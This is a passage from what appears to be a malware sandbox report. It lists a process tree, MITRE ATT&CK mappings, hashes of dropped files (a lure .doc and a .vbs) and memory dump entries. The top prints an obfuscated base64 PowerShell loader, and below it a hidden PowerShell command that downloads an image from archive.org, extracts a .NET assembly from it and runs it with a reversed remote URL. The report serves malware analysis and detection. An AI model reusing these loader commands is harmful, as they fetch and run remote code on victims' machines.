⭣ZQ㍋ ∴ ♣ ▶ ⭣2㍋ ∴ ♣ ▶ ⭣DQ㍋ ∴ ♣ ▶ ⭣T㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣ZwB0㍋ ∴ ♣ ▶ ⭣Gg㍋ ∴ ♣ ▶ ⭣KQ㍋ ∴ ♣ ▶ ⭣7㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣YwBv㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣BC㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣WwBT㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣EM㍋ ∴ ♣ ▶ ⭣bwBu㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣ZQBy㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣XQ㍋ ∴ ♣ ▶ ⭣6㍋ ∴ ♣ ▶ ⭣Do㍋ ∴ ♣ ▶ ⭣RgBy㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣bQBC㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣cwBl㍋ ∴ ♣ ▶ ⭣DY㍋ ∴ ♣ ▶ ⭣N㍋ ∴ ♣ ▶ ⭣BT㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣cgBp㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Zw㍋ ∴ ♣ ▶ ⭣o㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣YgBh㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣ZQ㍋ ∴ ♣ ▶ ⭣2㍋ ∴ ♣ ▶ ⭣DQ㍋ ∴ ♣ ▶ ⭣QwBv㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣p㍋ ∴ ♣ ▶ ⭣Ds㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bs㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣YQBk㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣BB㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣cwBl㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YgBs㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣WwBT㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣FI㍋ ∴ ♣ ▶ ⭣ZQBm㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣ZQBj㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣aQBv㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣LgBB㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣cwBl㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YgBs㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣XQ㍋ ∴ ♣ ▶ ⭣6㍋ ∴ ♣ ▶ ⭣Do㍋ ∴ ♣ ▶ ⭣T㍋ ∴ ♣ ▶ ⭣Bv㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣o㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣YwBv㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣BC㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣KQ㍋ ∴ ♣ ▶ ⭣7㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣B5㍋ ∴ ♣ ▶ ⭣H㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣ZQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣D0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣bwBh㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQBk㍋ ∴ ♣ ▶ ⭣EE㍋ ∴ ♣ ▶ ⭣cwBz㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQBi㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣eQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Ec㍋ ∴ ♣ ▶ ⭣ZQB0㍋ ∴ ♣ ▶ ⭣FQ㍋ ∴ ♣ ▶ ⭣eQBw㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣K㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣n㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣bgBs㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣Yg㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Ek㍋ ∴ ♣ ▶ ⭣Tw㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Eg㍋ ∴ ♣ ▶ ⭣bwBt㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣p㍋ ∴ ♣ ▶ ⭣Ds㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bt㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bo㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣D0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣eQBw㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣LgBH㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BN㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bo㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣o㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣VgBB㍋ ∴ ♣ ▶ ⭣Ek㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣p㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣SQBu㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣bwBr㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣K㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣dQBs㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣L㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Fs㍋ ∴ ♣ ▶ ⭣bwBi㍋ ∴ ♣ ▶ ⭣Go㍋ ∴ ♣ ▶ ⭣ZQBj㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣WwBd㍋ ∴ ♣ ▶ ⭣F0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣o㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣B4㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣LgBW㍋ ∴ ♣ ▶ ⭣EY㍋ ∴ ♣ ▶ ⭣UgBF㍋ ∴ ♣ ▶ ⭣Fc㍋ ∴ ♣ ▶ ⭣Lw㍋ ∴ ♣ ▶ ⭣2㍋ ∴ ♣ ▶ ⭣DY㍋ ∴ ♣ ▶ ⭣Mw㍋ ∴ ♣ ▶ ⭣v㍋ ∴ ♣ ▶ ⭣Dg㍋ ∴ ♣ ▶ ⭣NQ㍋ ∴ ♣ ▶ ⭣x㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣N㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣2㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣Mw㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣DI㍋ ∴ ♣ ▶ ⭣OQ㍋ ∴ ♣ ▶ ⭣x㍋ ∴ ♣ ▶ ⭣C8㍋ ∴ ♣ ▶ ⭣Lw㍋ ∴ ♣ ▶ ⭣6㍋ ∴ ♣ ▶ ⭣H㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣B0㍋ ∴ ♣ ▶ ⭣Gg㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Cw㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣n㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQBz㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣YQBk㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Cw㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣n㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQBz㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣YQBk㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Cw㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣n㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQBz㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣YQBk㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣s㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣UgBl㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣QQBz㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣s㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣Jw㍋ ∴ ♣ ▶ ⭣p㍋ ∴ ♣ ▶ ⭣Ck㍋ ∴ ♣ ▶ ⭣';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㍋ ∴ ♣ ▶ ⭣','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFREW/663/851.46.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
2d5a992b824dc0b8a9f54a29816c64a2

SHA1
f5568576c97888312673cf512800f77a7b1b9c50

SHA256
72ceacba3aa760db29b65412972e2896d725a5ee693e298b770c6b4ce5ce752f

SHA512
0e679b12a9d546ab83755c53afa054fd32f2757b27041ac89ce42f36c2c9fb451c460c79a2ef2cd64073817a0ea4c4546b558a91be5663f75b975aca5ab72444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a2482b1c702d53f0e528f1a2c99b2151

SHA1
1586595cdeb7cd46cbbc72e6fed6dec9a77f3359

SHA256
92587d408e3ad4a2f68a7c8600b1664029e1a5fb3c70ecfeaa6e773a2cb3d30b

SHA512
8b3db61bf1b377c6c2d1dca495fa87580fed03085b884feee0bc50f64a14dce501b68ff04bbb179a5882a865a0e584901548b30e16a5c042167ab3ab84376aca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{32C00ED8-E7E8-4440-BC96-4D4280A961F2}.FSD

Filesize
128KB

MD5
b345ddd79429c864104db4236c153e6e

SHA1
f61ad87a4adc5c698cdc61723f205e3b630f7b34

SHA256
4281284e8cacd9800bb1e200fffd1440994692ce2cc8b0dc7fa58ce9930f165a

SHA512
5ae6c8241ee867fc4ed39c40911880b839caebb4639b823b8b781c7444ded5879d44197d81b63c4f5fd5a2dffb2338daf92d5adae32a505729da15a07960ba4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
8476116f2c82563a72be631d6e061678

SHA1
343700abd940cbb38be902da4f6ad2e23b5268c3

SHA256
a08eb0f6ea646a90de2ef7a2825d7bb64dbdbdf4944d39648b32561f6ac81d1b

SHA512
b51cbc62631e9bd7dba9f9257ceaaeb621ff5f4ee2aac904ce779f0203c638e51174bc60333db7b79821281688dc10dfd7cf8d6a36de5869165e6b20c5db40e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{73AA6F50-4774-4FF2-82A2-9C6421D9B874}.FSD

Filesize
128KB

MD5
4661c020d5bd9644048277990322f8f2

SHA1
8a451e5b75e03ba29813fc0778adeb6d78d9664d

SHA256
39b77120419786a95b481191e09e77354b1646a49941fff222bf4dc8dbb3c95f

SHA512
684375cfed7c17048f49f3567bf60dbf78b680f3685826f9796d1e9486765197bb12514f16bcb782875e25b3a28126c73b667d2e32f2e5d416c62186373a74ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\yummycakewithbutterbunwhichverycreamyandyummutastewhichcreatedyummythingschocolatebutterbungood________yummycakerichbutter[1].doc

Filesize
88KB

MD5
85485a1e88e7a07db924b5e3ac587c52

SHA1
675d08c2fc31ef344b23f5c8552c2b850a1b3dca

SHA256
86f9c33378a2665c897d3fec71b4605d647282a699e672dd62c7e009ba6f5f5a

SHA512
3e8ccd7d6ec5d3bb6619361670735ec3489e6b8248652e365141cdb43ac020df775ffd05ee8664cd10b5ffb665f6c66f628339967e93e1de26ae0dd96b7ae715

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabDAC6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{D78A632E-30D8-434B-9F1D-54335E620F37}

Filesize
128KB

MD5
a9283a4a4c7da635d3d816cf085d278c

SHA1
3084b67c37faad36c34c74bfb2a2a59046c0fd35

SHA256
d4ba9d182115d3dc97416854e661240e4862ce3c93ed902312603e042302008d

SHA512
5cd9952f35727314d3d04a97925bc28bff4ad68f75b540ea427d51f47500775dc0ed89267aab44dade3073caad05580eb44c561825f924f759522b482b4449b0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d516412488c4e71d9ee96fc13a9df329

SHA1
0dce0b0068179b3e353fbc0b19cc0e7e2704701c

SHA256
9d142bb4cd91635d102ae3cd2130345ffb76fa727c4d569e8533c6483d7c723f

SHA512
2407847faa96a35de20dcaa90e8c395d79700e776a4ce8458f0e1dc576812700c4b0f465c0ca34a99d35da8a471c29b8122cbda9b457acfcd0483b0c2ef9669b

Download Submit
C:\Users\Admin\AppData\Roaming\coupecakebutterbuncakecreamy.vBS

Filesize
179KB

MD5
471dd33f5e7c5a9dffd327bf5ab4a52e

SHA1
28a8ddf2f11e593afcf03b5166bf2f22e5edc0e6

SHA256
b0d0a345dd67bccc4e4a4c9f46fae275c47347a75f19deabcbbd46018e5ded2b

SHA512
85d67454f1af5babc22355318d9512f3dfa480e54b26b6114ff8cf3ec97c0abb26319611806bf1bf295237cc6af3044a0facf6381e4e3fb1d58796fda7b27187

Download Submit
memory/2148-34-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2148-1-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2148-21-0x0000000002E00000-0x0000000002E02000-memory.dmp

Filesize
8KB

Download
memory/2148-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2148-141-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2752-18-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2752-16-0x000000002FD71000-0x000000002FD72000-memory.dmp

Filesize
4KB

Download
memory/2752-20-0x0000000003650000-0x0000000003652000-memory.dmp

Filesize
8KB

Download
memory/2752-122-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2752-136-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2752-137-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download